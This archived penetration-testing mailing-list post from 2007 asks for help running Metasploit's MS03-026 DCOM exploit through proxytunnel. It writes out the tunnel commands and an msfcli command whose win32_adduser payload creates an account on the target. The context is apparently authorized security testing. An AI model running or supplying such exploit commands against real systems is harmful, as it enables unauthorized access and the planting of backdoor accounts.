Penetration Testing mailing list archives
Running metasploit thru proxytunnel
From: James Kelly <macubergeek () comcast net>
Date: Sat, 6 Oct 2007 07:18:19 -0400
FolksI've been banging my head into my keyboard for two days now, not getting anywhere and I was hoping one of
you could smack me upside the head and tell me what I've screwed up. Problem: attacker IP: 1.2.3.4 proxy IP: 2.3.4.5 proxy port 6666 victim: 3.4.5.6 victim port: 7777 Proxytunnel setup: proxytunnel -a 666 -p 2.3.4.4:6666 -d 3.4.5.6:7777 **now the above config works fine with rdesktop when I use: proxytunnel -a 666 -p 2.3.4.5:6666 -d 3.4.5.6:3389 and I do rdesktop localhost:666 <--I can ts to the victim box just fine. When I try to do metasploit over proxytunnel I do config: Metasploit framework2exploit: msrpc_dcom_ms03_026 <--what I like to refer to as "Insecure Shell" ;-) goes to RPORT 135
payload: win32_adduser first the tunnel: proxytunnel -a 235 -p 2.3.4.5:6666 -d 3.4.5.6:135 now metasploitmsfcli msrpc_dcom_ms03_026 PAYLOAD=win32_adduser RHOST=localhost RPORT=235 PASS=password USER=blah
When I hit the exploit I see "Sending Request..." then nothing.I can rdesktop via proxytunnel to the victim successfully but cannot login with username blah password password.
Assume the victim is vulnerable to dcom. Now can anything obvious that I've screwed up?________________________________________________________________________ ____ 01001001 01100110 01111001 01101111 01110101 01100011 01100001 01101110
01110010 01100101 01100001 01100100 01110100 01101000 01101001 01110011 01111001 01101111 01110101 01101110 01100101 01100101 01100100 0111010001101111 01100111 01100101 01110100 01100001 01101100 01101001 01100110
01100101 0010111________________________________________________________________________ ____
------------------------------------------------------------------------ This list is sponsored by: Cenzic Need to secure your web apps NOW? Cenzic finds more, "real" vulnerabilities fast. Click to try it, buy it or download a solution FREE today! http://www.cenzic.com/downloads ------------------------------------------------------------------------
Current thread:
- Running metasploit thru proxytunnel James Kelly (Oct 06)
- Re: Running metasploit thru proxytunnel Alexander Bondarenko (Oct 10)
- Re: Running metasploit thru proxytunnel jond (Oct 11)
- Re: Running metasploit thru proxytunnel Alexander Bondarenko (Oct 10)